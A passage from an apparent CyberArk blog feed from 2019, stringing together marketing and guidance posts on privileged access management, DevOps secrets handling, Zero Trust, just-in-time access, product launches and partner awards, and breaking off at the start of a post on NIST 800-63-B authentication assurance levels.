It’s critical to enforce the principle of least privilege (POLP), giving employees the minimum privileges and access required to perform their job functions. It’s also essential to implement application control to block known malicious applications from running, restrict (or greylist) unknown applications and allow only trusted applications to run.

Extending  privileged access management to your organization’s endpoints can help reduce risk by eliminating unnecessary local admin privileges, blocking privileged credential theft attempts and ransomware attacks, auditing malicious behavior and strengthening the security of privileged accounts – all without sacrificing user productivity.

  1. Audit and compliance revolve around privileged access.

Highly regulated industries like banking and healthcare are required to maintain a comprehensive audit trail of privileged user activity. These mandates come at both the enterprise policy level and from industry regulations and compliance frameworks.

There’s a critical need for these organizations to establish individual accountability for all privileged users while also having the ability to review privileged sessions based on risk. Many organizations are required to review a specific percentage of all their privileged workloads, though trying to identify high-risk activity manually can feel like searching for a needle in a haystack.

Implementing strong privileged access controls that enable you to predefine commands, actions and activities, create risk scores and easily pinpoint threats helps to dramatically simplify audit and compliance requirements and save time.

To learn more about how CyberArk can help you start or expand your privileged access management program, attend our webinar,  or visit our privileged access management resource library.

]]>
How to Establish Enterprise Requirements for DevOps https://www.cyberark.com/blog/how-to-establish-enterprise-requirements-for-devops/ Tue, 06 Aug 2019 13:00:02 +0000 https://www.cyberark.com/?p=71642 DevOps Culture

Editor’s Note: Part 3 of a 5 Part series providing practical guidance and insights to security leaders for securing DevOps environments. This series is based on insights from Global 1000 CISOs. This installment covers how to establish enterprise requirements for securing credentials and secrets in DevOps and cloud environments. This series includes information on how to:

  1. Transform the security team into DevOps partners
  2. Prioritize securing DevOps tools and infrastructure
  3. Establish enterprise requirements for securing secrets and credentials
  4. Adapt processes for application testing
  5. Evaluate the results

Privileged account and credential compromise is at the root of virtually every major cyber attack today. While most security teams have established enterprise requirements for securing privileged credentials in traditional IT systems such as Windows for human identities and applications, securing DevOps and cloud based environments too often lags behind. As organizations accelerate digital transformation initiatives, these requirements must extend to DevOps, cloud and non-human identities. The challenge becomes how can the security team help make this happen?

Developer and DevOps cultures are very different from security culture. To make security best practices a reality, enterprise security requirements must align with DevOps culture. If developers feel that the security requirements are slowing them down, expect them to resist adopting new measures to protect privileged accounts, credential and secrets. So, make it easy for developers to adopt secure practices. If there is pushback on adding steps to existing processes, emphasize the operational efficiencies that can be achieved. For example, manually managing privileged credentials takes a lot of effort and puts the responsibility on the developer – offloading this work from the DevOps teams will free up their valuable time.

In this chapter of our CISO View Insights blog series, we’ll explore four best practices for establishing enterprise requirements for securing credentials in modern environments with strong privileged access management. These recommendations are based on the real-world experiences of CISOs from Global 1000 organizations.

  1. Mandate centralized secrets management for DevOps and cloud. Implement a centralized secrets management system that acts as an intermediary between users (both human and non-human/machine identities) and the databases, resources and other tools and critical systems that need to be accessed. This helps keep your secrets secret, since users don’t ever see the actual credentials. For example, if a developer needs access to the cloud console, they authenticate to the secrets management system. The system verifies that they are authorized and provides access to the console without revealing the privileged credentials.

 This centralized system should store all the secrets and credentials used by the developers and DevOps administrators, tools and applications in a tamper proof vault. It should also provide strong, multi-layered security – from encryption and regular credential rotation to integration with multi-factor authentication (MFA). Additionally, monitoring and logging credential usage helps to instill user accountability. To help detect anomalies quickly, establish a baseline for normal usage patterns and provide each machine its own unique identity to more easily audit and monitor its access to secrets.

  1. Extend enterprise-level capabilities for auditing and monitoring. It is really important to have a complete picture of who has access to what, and to be able to audit and monitor access across your entire environment. You need to be able to answer questions like:
  • What are all the things “Sam” has access to across the enterprise?
  • Where are all the privileged credentials with access to the customer database? Who can access these credentials?
  • Which applications have access to the customer database? Why is Application X on the list?
  • “Mary” recently left the company. Have any of her credentials been used since then?
  • Are DevOps practitioners re-using privileged Windows passwords for other purposes?
  • This machine category typically accesses these three services (a, b, c), so why did it just interact with service “g”?

 The centralized secrets management solution should be integrated with a core system of trust, for instance, using an LDAP server/Active Directory for authentication. Additionally, you need to have situational awareness when it comes to vulnerabilities, cyber threats and cybersecurity posture integration with controls assurance and analytics solutions like Security Information and Event Management (SIEM) and User and Entity Behavior Analytics (UEBA). 

  1. Eliminate privileged credentials from DevOps tools and applications. It’s vital that you remove secrets from all DevOps tools, configuration files, scripts and code and require that these secrets be retrieved, instead, from a secure vault. Make this a key priority and best practice. Because it will likely take time, this essential objective may need to be completed in stages. For instance, you could begin by requiring development of all new applications to adhere to this best practice.

Inadvertently including access keys and credentials in code committed to a repository is a common slip up, but it has led to multiple breaches and crypto currency mining exploits by attackers.  To help ensure that developers cannot inadvertently commit code, configuration files or scripts with secrets to a code repository, secrets, cloud access keys and other sensitive credentials should never be included in code. These standards should be set for both code developed in-house and third party code. 

  1. Develop reusable code modules to provision secrets to applications. Security teams should collaborate closely with their DevOps counterparts to determine how secrets will be provisioned to applications based on application requirements and developer preference. Some may prefer API calls, where an application makes an API call to a secrets vault, which returns a secret to the application. Others may prefer secrets injection, where an intermediary program retrieves secrets and injects them into the application environment. To limit exposure and risk, it’s important to make sure that, when secrets are outside the vault, they are frequently rotated, ephemeral and not persistent. For example, with a memory-mapped file, the secret should be inaccessible when the process exits.

 For more insights on bringing DevOps and security teams into alignment, download the full CISO View report, Protecting Privileged Access in DevOps and Cloud Environments, watch a short highlights video or tune into our on-demand webinar for a deeper dive.  You can also visit our first blog post of the series for an overview.

]]>
CyberArk Privilege Cloud Reduces Risk with PAM SaaS https://www.cyberark.com/blog/cyberark-privilege-cloud-reduces-risk-with-pam-saas/ Thu, 01 Aug 2019 16:12:03 +0000 https://www.cyberark.com/?p=71587 PAM SaaS

Creating and executing a successful privileged access management program can seem like a daunting task. Privileged access is pervasive throughout the enterprise and can be difficult to manage without the right tools. Still, protecting privileged access and monitoring its usage is paramount for organizations as they work to secure an evolving digital business.

So, what do you do if you’re an organization that is already stretched for cybersecurity talent and you have a growing list of high priority security projects on your plate with tackling privileged access at or near the top of your list?

Organizations that have not started their privileged access management (PAM) journey should look to the leader in privileged access management, CyberArk, to quickly reduce the risk that unmanaged privileged access presents to every company. The CyberArk Privilege Cloud is delivered via software-as-a-service (SaaS) to simplify customer’s management efforts, removing the need to worry about upgrades or deploying infrastructure. The CyberArk Privilege Cloud also works to shorten the time security teams need to significantly reduce the privileged access risk to the organization. Also, CyberArk is the first SaaS Privileged Access vendor to offer a solution that includes 150+ integrations out of the box to help quickly secure more workloads across the enterprise. Check out the CyberArk Marketplace to find pre-built technical integrations that can help you automatically rotate credentials and manage sessions across a variety of platforms!

CyberArk Privilege Cloud can help organizations with the following use cases:

1. Continuously Discover and Manage Privileged Credentials

Cyberark Privilege Cloud provides a fast and easy way for organizations to begin protecting privileged access. You can quickly onboard and automatically rotate the credentials that your administrators use to access sensitive critical systems across your enterprise to help ensure that access misuse does not negatively impact your business. As new technologies and employees are brought into the organization, you can confidently manage privileged access with a PAM SaaS solution that enables security teams to spend more time on securing privileged access and less time managing the back-end.

2. Isolate Privileged Sessions and Protect Credentials

CyberArk Privilege Cloud can automatically protect connections to a target and make sure the credential is not compromised by initiating a secure proxy that fully isolates each session without ever needing to expose the credential to admins. This improves the security posture of your organization by removing the need to display passwords and, with the integrations of technologies like RDP, SSH and others, CyberArk Privilege Cloud can provide a near seamless experience for administrators.

3. Record and Audit Privileged Sessions to Address Compliance Requirements

Almost every organization must adhere to at least one compliance regulation and many must adhere to several. Anyone who has been through an audit knows just how arduous that can be. With CyberArk Privilege Cloud, you get a full audit trail of privileged access usage. CyberArk organizes and present the audit trail data in a way that helps you to quickly prove that you were taking the appropriate steps to secure your company. The audit capabilities can also be critical when tracing the roots of a breach or when you want to see how privilege is being used in your firm.

Over its long tenure in the cybersecurity industry, CyberArk has witnessed many technologies and companies sold, bought and merged, but CyberArk and the CyberArk Core Privilege Access Security Solution have lasted. It is widely considered the leading solution to protect privileged access because it consistently delivers value back to the organization.

CyberArk offers privileged access management solutions and services that enable our customers to build strong privileged access management programs facilitated by our leading SaaS solution. Therefore, CyberArk has introduced Blueprint, the CyberArk Privileged Cloud Success Plan. The Success Plan is a service package that Privilege Cloud customers can select and is designed to help companies get the most from their investment in CyberArk Privilege Cloud and accelerate the adoption of CyberArk for sensitive workloads across the enterprise.  A Privileged Access Management expert from CyberArk or a Certified Partner will help build an effective program that defines the repeatable processes to leverage for expanding privileged access management throughout the organization.

CyberArk remains singularly focused on improving the security posture of your organization without adding to your laundry list of daily security tasks. To learn more, please fill out the form here to request a demo and talk to a CyberArk SaaS expert.

 

]]>
2019 CyberArk Americas Partner Excellence Awards at Impact Chicago https://www.cyberark.com/blog/2019-cyberark-americas-partner-excellence-awards-at-impact-chicago/ Tue, 30 Jul 2019 16:06:09 +0000 https://www.cyberark.com/?p=71427

At CyberArk, partner collaboration and support are critical to advancing privileged access security innovation and impact. We know that cybersecurity is a team game and that the best way to help protect organizations from cyber attacks is to work together. As one of the industry’s largest networks of security-focused organizations, the CyberArk Partner Network brings together the strengths of advisory consultants, global systems integrators and regional solution providers to address critical privileged access management (PAM) challenges.

The best-in-class program offers partners the industry’s most comprehensive partner enablement offerings to deepen security expertise and extend customer value. With the market-leading  CyberArk Privileged Access Security Solution, partners have the flexibility and scalability to capitalize on emerging market trends from cloud and DevOps to Robotic Process Automation, while accelerating their business.

This month at CyberArk Impact Americas conference in Chicago, we had the pleasure of convening with more than 400 partner representatives to explore emerging privileged access security approaches; share on-the-front-lines experiences and tech insights; address questions, challenges and best practices for multi-layered cybersecurity programs and engage in deep technical training.

As part of this event, and to celebrate our partners’ valuable contributions, we were pleased to announce the 2019 recipients of the annual CyberArk Americas Partner Excellence Awards. This year’s winners are:

All Americas

  • Innovative Solution Partner – Cognizant
  • Growth Systems Integrator Partner of the Year – Accenture
  • Global Systems Integrator Partner of the Year – PwC

United States

  • Partner of the Year U.S. – Optiv
  • Growth Reseller Partner – Clango and Gotham

Canada

  • Partner of the Year Canada – Optiv
  • Growth Reseller Partner – ION United

Latin America

  • Partner of the Year Latin America (Mexico) – Arame
  • Growth Reseller Partner – CASD and NovaRed

These awards celebrate top CyberArk channel, systems integrator and solution provider partners in the United States, Canada and Latin America. These partners have demonstrated strengths across a variety of categories including excellence in cybersecurity innovation, commitment to training and skills development, and driving customer success with market-leading privileged access management solutions to help defend against sophisticated cyberattacks.

At Impact, we also unveiled a host of new enablement programs, making it easier than ever for partners to align with market dynamics and grow their businesses through prioritizing privileged access management. These include a new competency-based tier structure, new Certified Sales Professional and Certified Pre-Sales Engineer modules and access to new sales and marketing tools and programs.

We congratulate all of this year’s winners and look forward to our continued collaboration to address today’s most critical privileged access management challenges and shape the future of cybersecurity.

For more information, read about the CyberArk Partner Network.

 

]]>
Supply Chain Meets Blockchain: A Perfect Match https://www.cyberark.com/blog/supply-chain-meets-blockchain-a-perfect-match/ Thu, 25 Jul 2019 15:07:30 +0000 https://www.cyberark.com/?p=71352 Block Chain and Supply Chain

Editor’s Note: In late 2018, CyberArk published five cybersecurity predictions for 2019. This deep-dive blog series will examine each prediction in detail to help organizations stay on top of emerging threats and out-innovate and out-maneuver cyber attackers.  One of the goals for this series is to provide updates on how these trends develop and progress over the course of the year. Today’s topic is blockchain for the supply chain industry.

It only takes a quick Google search of “supply chain diagrams” to see how complicated the modern day supply chain has become. There are numerous – sometimes hundreds or even thousands – of suppliers, partners, third parties, bankers and lawyers involved in in the process of producing and distributing products for consumers. As a result, simple data and financial transactions often turn into lengthy, multi-step procedures. Compounding these challenges, supply chains are increasingly frequent targets of cyber crime. A recent Supply Chain Insights study revealed that the number one event impacting supply chains from 2013 to 2018 was cyber attacks or computer hacking.

Blockchain has the potential to turn the tables, helping organizations streamline supply chain management (SCM), bolster cybersecurity across each touchpoint, maximize customer value and maintain a competitive edge. But, first, here’s what you need to know about blockchain technology.

Blockchain 101

Blockchain is an open, distributed ledger that can record business transactions between parties in a secure, verifiable and permanent way. Every time a person records a blockchain transaction, they add a record – or “block” – that others in that particular chain (and only those in that blockchain) can read. Each block contains a cryptographic hash (think of it as a cyber fingerprint), an unchangeable timestamp, the transaction data (typically represented as a “Merkle tree”) and the hash of the previous block to link the two together.

Forrest Williams from the CyberArk Red Team explains it like this: “You can imagine the blockchain as millions of paper bank statements ‘chained’ together with invisible cryptographic chains and new sheets of paper are constantly added as new people spend money.”

Once it is recorded, a block cannot be altered without also altering all other blocks. This means that if someone does attempt to change or erase a block, the blockchain – which is managed and validated by a peer-to-peer network – will compare it to the other distributed copies of the block, quickly find the discrepancy and reject the change, ensuring that the original block remains intact.

Why Blockchain for the Supply Chain?

Large manufacturers are increasingly turning to blockchain to simplify complex “chain of command” processes, reduce costs and transform their supply chains – from sourcing to warehousing to delivery to payment. For example, food and beverage giant Pepsi recently conducted a blockchain trial in Asia Pacific that resulted in a 28 percent boost in supply chain efficiency. Walmart also implemented a blockchain system to better trace food products to their original source and maintain food safety – from tracking pork from China to tracing mangoes from Mexico. And IBM and Maersk co-developed TradeLens, a global shipping supply chain service that uses blockchain technology to help improve process efficiency.

Yet, perhaps blockchain’s greatest promise for the supply chain is enhanced data security for digital records. Following allegations of nation-states targeting the supply chain at the chip level to embed backdoors into both B2B and consumer technologies, organizations are increasingly embracing blockchain to secure their supply chains and reduce the risk of fraud. The distributed nature of blockchain makes it very well suited to validate every step in the supply chain – including the authenticity of hardware and software.

For example, if a wholesaler receives information from a manufacturer, blockchain can authenticate the sender of the data, validate the time the data was sent and ensure that the information has not been tampered with during transmission. With this strengthened security and transparency across each level of the supply chain, organizations are empowered to optimize processes and better manage customer demand.

While blockchain has certainly sparked positive change across the supply chain industry, widespread adoption will not happen overnight. Given its distributed nature, the greatest barriers to blockchain are cooperation and scale. To gain true end-to-end visibility and enhanced data security across the supply chain, it’s not enough for one or two suppliers to employ the technology – all parties must join the blockchain platform and agree to abide by its standards.

Our next installment in the Predictions series will feature the future of trade wars and commercial espionage.

]]>
Are You Spending in the Right Places to Break the Cyber Kill Chain? https://www.cyberark.com/blog/are-you-spending-in-the-right-places-to-break-the-cyber-kill-chain/ Tue, 23 Jul 2019 16:19:13 +0000 https://www.cyberark.com/?p=71177

The shift that organizations are undergoing as they move customer and citizen data online, push new services, create new ways to interact, and improve supply chain efficiencies is one of the most seismic things to have happened in IT since cloud…or SDN…or virtualization…or high speed internet.

The latest CyberArk Global Advanced Threat Landscape Report arrives against the backdrop of this change.  The impact and demands of digital transformation represent a – potentially – massively expanded attack surface.  Bottom line?  Right now, it’s really important to be spending your security budget in the right places.

The Cyber Kill Chain
The cyber kill chain model: Focus security spending on blocking lateral movement and privilege escalation attacks.

Consequently, investigating where information security professionals targeted their budgets to combat cyber threats was one of the principle goals of this CyberArk Global Advanced Threat Landscape Report. To do this, CyberArk mapped security professionals’ spending plans against the cyber kill chain – initial infection, reconnaissance, command and control, lateral movement, privilege escalation and disruption and damage. We found that there are two places on the kill chain that represent the areas of greatest risk. The first is the area of initial infection. Our survey shows that half of global organizations believe that there is no way to block all attackers all the time from penetrating the network.

Since it seems clear that some attackers will be able to get in, it’s important that organizations concentrate their spending on technologies that can address the second area of highest risk – blocking lateral movement and privilege escalation. So, it’s good to see that 28 percent of survey respondents are planning on doing just that by focusing their efforts on blocking lateral movement and privilege escalation within their systems over the next two years.

Controls that address these phases of the cyber kill chain can thwart attackers before they can get to what really underpins today’s digital businesses – critical data and assets. With limited resources to bring to an expanding digital threat landscape, organizations need to pick their battles. Protecting critical assets is the fight organizations can’t afford to lose.

Download the eBook to see the full survey results.

]]>
Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust https://www.cyberark.com/blog/upping-the-security-ante-how-to-get-teams-buy-in-for-zero-trust/ Thu, 18 Jul 2019 19:41:07 +0000 https://www.cyberark.com/?p=98923

No one likes change. As technology and security practitioners, we’re hardwired to expect everyone to embrace shiny, new technologies and services, and rush to give them a try as they’re rolled out. But ask anyone who’s led the introduction of a new IT initiative, and they can tell you otherwise.

It’s hard to get an IT team on the same page, let alone a company with thousands of employees. In cybersecurity, where you’re only as strong as your weakest link, it’s paramount to have protection for and from every person across an organization. Look at it this way: it doesn’t matter that you lock your doors and windows if you leave even a single one open. Bad actors will always find the path of least resistance.
In the face of these odds, Zero Trust is rapidly gaining popularity as a proven alternative to traditional security tactics, which can no longer effectively secure the perimeter to let the “good guys” in and keep the “bad guys” out. The Zero Trust motto is “never trust, always verify,” and this approach ensures that every person and device with access are who and what they say they are.

However, the shift to Zero Trust doesn’t happen overnight. Technology is an important element, but the fact is you can’t go out and “buy” a Zero Trust anything. Much like freedom, happiness and New York City, Zero Trust is a state of mind – an idea that holistic organizational shift happens around. In order for it to work, everyone needs to be looking through the same cybersecurity lens.

Bringing Everyone to the Table

When executives ask about the best cybersecurity solution, I always say: “Easy, just unplug everything from the Internet, power down all the computers, and destroy all the smartphones — then you’re secure.” Having the “best” security protocols doesn’t mean anything if the barriers you construct stop the bad guys dead in their tracks, but also kill productivity of the good guys.

For example, most organizations need to find a balance between the end-user experience and improving the security posture. In fact, on average, business users spend 11 hours per year entering and/or resetting passwords, which costs organizations an estimated average of $5.2 million annually in lost labor and productivity, according to Ponemon. That’s where Zero Trust comes in, improving access control without compromising business agility and convenience.

But when it comes to any kind of organizational change, people are always at the heart. It doesn’t necessarily matter if a new login experience like single sign-on (SSO) is a more secure and seamless experience, ultimately it’s still different for users. Employees who left on Friday doing it one way, came back Monday and everything was changed. If they weren’t anticipating that, they might even call the help desk.

That’s why it must always start with the people. It’s important to communicate the reasons for change, the benefits to the user, and the importance to the organization. You can’t get to Zero Trust without that education and culture element to get people on board.

Assess the Strength of Your Hand

The fact is that a lot of the elements of Zero Trust are already implemented in some pockets of every organization. There might be key features like single sign-on (SSO) or multi-factor authentication (MFA) for certain apps or services, but for a holistic Zero Trust practice, those ideas must extend across the organization and touch everything you do.

Zero Trust provides a strategic lens to evaluate where the organization stands on cybersecurity and the resources you’re trying to protect. Once everyone is looking through the same lens, you can determine the strength of your hand, and come up with your next move.

This set of initiatives should be calculated and prioritized based on your greatest risks. For example, it might be most important for the organization to protect customer data, or maintain compliance around financial or healthcare records, or help employees gain access to critical services more quickly.

Going All-In

Betting it all on Zero Trust doesn’t mean you should throw away your currently deployed technologies that keep the perimeter safe. Rather it’s a philosophical approach to improving your security posture over time.

Zero Trust is a lot like building code. You can’t just drop in a new string of code if it causes the existing system to crash. For new code (IT initiatives) to be put in place successfully, you need to be sure it conforms to the (cybersecurity) standard already set. It must be tied into and governed by the same access system that everything else is. And you’re never really done making updates.

That’s why it’s important to have broad evangelism and buy-in from across the organization. When they see Zero Trust in action as part of a proactive and strategic approach, instead of a random change that is viewed as disruptive, it makes it much easier to roll-out both new user and customer experiences.

In our next blog, we’ll talk more about that road to becoming Zero Trust, and how to seamlessly unite old with the new when it comes to your cybersecurity technology stack.

 

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Announcing the 2019 CyberArk Marketplace Community Integration Award Winner for Greatest Cybersecurity Impact https://www.cyberark.com/blog/announcing-the-2019-cyberark-marketplace-community-integration-award-winner-for-greatest-cybersecurity-impact/ Thu, 18 Jul 2019 15:15:32 +0000 https://www.cyberark.com/?p=70940

With more than 10,000 visitors per month, the CyberArk Marketplace is the premier destination for privileged access management-related technology integrations for organizations around the globe.

Last month, we introduced community contributions to the CyberArk Marketplace, enabling CyberArk partners and customers to submit and upload their own integrations with the CyberArk Privileged Access Security Solution. With the launch of this new feature came an open challenge: Submit an integration that makes a big impact and helps advance the community’s collective fight against cyber attackers.

Today on the main stage at CyberArk Impact Americas in Chicago, we were thrilled to announce our 2019 CyberArk Marketplace Impact Award winner: Integrity360, one of Ireland’s leading cybersecurity consultancies and a true MVP in the team game that is cybersecurity.

The Integrity360 privileged access team, led by security consultant Pranav Chugh, answered the call and surpassed our highest expectations by submitting not just one… but four innovative integrations for high-value systems! Available for download on the CyberArk Marketplace, these integrations include:

Brand new on the CyberArk Marketplace, the Integrity360 community integrations have already been downloaded many times! To honor their work and contributions, the Integrity360 team received the CyberArk Marketplace Impact award at CyberArk Impact in Chicago – the world’s largest gathering of privileged access management professionals. At CyberArk, we want to celebrate the willingness of Integrity360 and other members of our community to collaborate and share for all of our benefit.

The caliber of integrations submitted in this first month alone has been phenomenal and we’re so excited to see what valuable contributions the cybersecurity community has in store. If you haven’t submitted one yet, we encourage you to explore the CyberArk Marketplace and submit your integrations. Remember – when you contribute to the CyberArk Marketplace, everyone benefits from the ability to collaborate, exchange information and solve cybersecurity challenges faster and smarter together!

A huge thank you to all of the CyberArk Marketplace community integration contributors thus far, and congratulations to Integrity360 – the 2019 CyberArk Marketplace Impact Award winner!

]]>
Just-in-Time Access Just How You Want It https://www.cyberark.com/blog/just-in-time-access-just-how-you-want-it/ Thu, 18 Jul 2019 13:00:26 +0000 https://www.cyberark.com/?p=70919 Just-in-Time Access

Part one of this series discussed the history and backstory of just-in-time, its history in the 1970s with Toyota manufacturing plants and how this methodology has made its way into cybersecurity in the form of just-in-time (JIT) privileged access. In this next entry, we’ll dive into how the CyberArk Privileged Access Security Solution has both built on existing functionality and evolved in order to address JIT.

To begin, there is always going to be a need to secure permanent accounts that require usernames and passwords, like service accounts, built-in admin accounts and domain controller credentials. Secure Just-in-time access also requires recording and monitoring privileged activity and sessions. Without this capability, there is no way for an organization to ensure that even provisional access is being leveraged as it was intended. CyberArk’s approach is that, even if a privileged account exists for only a few minutes, during those minutes it’s still vulnerable to compromise and, thus, still needs session audit for tracking and visibility.

At a high level, the important concepts for just-in-time are the ability to remove unnecessary standing access and to provide access only as needed. JIT access is granted by either routing an approval request to an administrator for validation or through a set of rule-based policies that define who can reasonably access what. This approvals process can also be automated leveraging APIs and through a variety of integrations, including IT Service Management (ITSM) solutions (available via the CyberArk Marketplace).

The underlying purpose of JIT is to provide the minimum level of privilege for the minimum amount of time with full session audit whenever possible. These concepts are at the core of how CyberArk looks at just-in-time access. Here is an overview of how CyberArk addresses JIT:

Broker and remove access. The CyberArk Privileged Access Security Solution enables the creation of policies that require users to provide a justification for connecting to a specific target for a defined time frame. Users must already have a standing, privileged shared account for which CyberArk manages the credentials. This is how many CyberArk customers have implemented JIT controls to date and it provides a primary route to implement JIT controls for customers who are looking to thoroughly safeguard their most critical assets.

Ephemeral accounts. Ephemeral accounts are one-time accounts created on the fly, which are immediately deprovisioned or deleted after use. When using ephemeral accounts, ensuring that sessions are recorded and audited is critical. CyberArk has two different ways to do this.

  1. Integration with AWS Security Token Service (STS). The STS integration enables AWS Identity and Access Management users to request temporary, limited privileged credentials. CyberArk integrates with STS to automatically generate role- or policy-based temporary sessions for the AWS Management Console or API level access, which can be recorded and monitored in real time.
  2. Integration with the Privileged Session Manager SSH Proxy and Active Directory (AD) Bridging, a feature of CyberArk Least Privilege Server Protection’s software. The CyberArk Privileged Session Manger SSH Proxy can grant dynamic access to Unix and Linux systems based on AD Permissions. If access is approved based on AD permissions, then the Privileged Session Manager SSH Proxy brokers an SSH connection to the target, creating a temporary account for the requesting user based on their username and creates the session to the user. The account is removed after the session once access is no longer valid.

Temporary Elevation. CyberArk has long supported the ability to elevate privileges to allow users access to privileged accounts or to run privileged commands. This quarter CyberArk is introducing new capabilities for JIT Elevation and Access with Endpoint Privilege Manager. This release provides customers with the ability to temporarily provide local admin access to Windows workstations, servers, and Macs on a by-request, timed basis and to remove access when time is up. JIT Elevation and Access with Endpoint Privilege Manager is an agent-based solution that provides a full audit trail for privileged activities with the ability to terminate applications and sessions in real time.

Additionally, since the release of Version 10.6 of the CyberArk Privileged Access Security Solution, CyberArk has provided an agentless alternative to JIT Elevation and Access. With this functionality, users can get Windows local admin access through the CyberArk web console for a set period of time.

Whether it’s standing or just-in-time access, organizations need a way to secure privileged accounts, credentials, and secrets. With CyberArk, customers can implement the approach that makes the most sense for their organization taking into account their security and operational requirements.

]]>
Introducing CyberArk Alero: Reduce Risk from Remote Vendors https://www.cyberark.com/blog/introducing-cyberark-alero-reduce-risk-from-remote-vendors/ Wed, 17 Jul 2019 15:00:48 +0000 https://www.cyberark.com/?p=70835

We are pleased to introduce CyberArk® Alero™. Alero is a new solution from CyberArk and we wanted to celebrate that with a fresh, new take on the blog. Instead of reading a long explanation, this time you get to sit back and enjoy a video. But, before you click play, there are a few things you might like to know about Alero.

Working with remote vendors can quickly become a major gap in your organization’s cybersecurity defenses. CyberArk Alero is a new software-as-a-service (SaaS)-based solution that works with the CyberArk Privileged Access Security Solution to mitigate risks associated with remote vendors accessing critical systems, while providing fast access to CyberArk for remote vendors. Alero brings the power of Zero Trust access, biometric authentication and just-in-time provisioning to bear on the problem.

Now, remote vendors don’t need to worry about VPNs, agents or passwords when obtaining privileged access to critical internal systems. All they need is an ordinary smart phone and CyberArk Alero. How does this work? Watch the video below to find out.

    
            
 

Learn more about how Alero secures access for remote vendors or download the Alero datasheet.

]]>
The Launch at Impact: Privileged Access Security Solution Version 11 https://www.cyberark.com/blog/the-launch-at-impact-privileged-access-security-version-11/ Wed, 17 Jul 2019 12:45:47 +0000 https://www.cyberark.com/?p=70746 Privileged Access Security v11

The 13th annual and largest ever CyberArk Impact Americas event officially kicked off in Chicago, bringing together customers, partners and a ton of cyber security experts to discuss all things privileged access management. One of the big announcements at Impact is the launch of the CyberArk Privileged Access Security Solution version 11. The latest version provides a geo-distributed architecture to support active/active Enterprise Password Vault topologies and simplifies the development of secure applications.

Let’s walk through some of the best features from this release in a bit more detail.

Geo-distribution and Support for Active/Active Enterprise Password Vaults

CyberArk is extending privileged access management to active/active architectures with multiple Enterprise Password Vaults. Customers have the ability to configure the CyberArk Privileged Access Security Solution to work in active/active topologies, providing transparent automatic failover and maintaining critical functions, such as password retrieval and session management, across geographically distributed vault configurations in the event of an outage. Moreover, this new architecture enables customers to work directly with their local vault, which automatically syncs with the master/primary vault (see Figure 1.). This ensures increased performance and resiliency and removes dependencies between different geo-locations that previously relied on a single vault. Along with previously released support for multiple web consoles and active/active vault configurations for CyberArk Application Access Manager, we deliver the industry’s most robust solution for high availability and disaster recovery in the privileged access management category.

 

Figure 1. The new geo-distributed architecture provides active/active support for credential retrieval and session management services.

Simplified Development of Secure Applications for Kubernetes and Red Hat OpenShift Environments

Hard-coding credentials in applications continue to pose an ongoing security risk, which is too often deprioritized by development teams wanting to rapidly deploy new applications. To increase developer adoption, CyberArk is adding an innovative new capability to Application Access Manager – Secretless Broker. Secretless Broker simplifies how applications in Kubernetes and Red Hat OpenShift environments securely access MySQL and PostgresSQL databases, HTTPs based services and SSH.

With Secretless Broker, when an application needs to securely access a resource, the app simply makes a local connection request to Secretless Broker. Secretless Broker then automatically authenticates the app, fetches the required credentials from the vault and establishes a connection to the database or other resource. Like the CyberArk Privileged Session Manager, Secretless Broker isolates the application so that it no longer has to store the secret, much like how an admin using Privilege Session Manager doesn’t need to know the password. This approach reduces the attack surface since the application doesn’t have access to credentials, preventing the inadvertent leaking or exposure of privileged credentials.

The approach offers two major simplifications for developers. First it eliminates the need to write API calls to fetch an access credential or secret and, second, it eliminates the need for the application to directly handle secrets. Only CyberArk offers this type of capability and, going forward, CyberArk plans to support additional databases, web applications and other services with Secretless Broker.

Secretless Broker is offered as a fully supported feature of the Application Access ManagerDynamic Access Provider and is also available for CyberArk’s open source secrets management solution, Conjur. Register for the Application Access Manager Secretless Broker webinar Security Win: Giving Developers the Access They Need Without the Hassle via Secretless Broker, at 1pm EST, 5 September.

Expanded Authentication Options Simplify Securing Applications

The latest release of Application Access Manager adds REST API support for Open ID Connect (OIDC) via the Dynamic Access Provider, along with existing support for AWS, Kubernetes/OpenShift, and LDAP authentication. With OIDC support, applications can natively and securely get secrets from Dynamic Access Provider to access other services and resources without needing to reauthenticate. This alongside other expanded authentication options make it easier for customers to use Application Access Manager to secure their increasingly large application portfolios, which can include hundreds of commercial-off-the-shelf (COTS), cloud native and other applications.

Partner with the Number One Leader in Privileged Access Management

The release of version 11 continues to demonstrate CyberArk’s ability to deliver the most comprehensive privileged access management functionality for both human and non-human users in the market. We continue to innovate with our solution to enable our 4,600+ customers to defend against targeted attacks while delivering a simplified experience to security, operations, and end users.

 All of these features will be available to customers who upgrade to the CyberArk Privileged Access Security Solution version 11, which will be available this quarter.

]]>
NIST 800-63-B: Authentication and Lifecycle Management Guidelines https://www.cyberark.com/blog/nist-800-63-b-authentication-and-lifecycle-management-guidelines/ Tue, 16 Jul 2019 15:19:12 +0000 https://www.cyberark.com/?p=99104

Digital Authentication and Authentication Assurance Levels (AAL)

NIST defines authentication as a “process of determining the validity of one or more authenticators used to claim a digital identity.”  In essence, authentication provides proof or assurance that an individual attempting to login to a service or perform a transaction online does in indeed possess and actively control a token or an authenticator used to authenticate to the service. The confidence or the degree of assurance with which we can definitively say that the individual is indeed in possession of the authenticator is referred to as “Authentication Assurance Level” or AAL. The guidelines document defines three AALs:

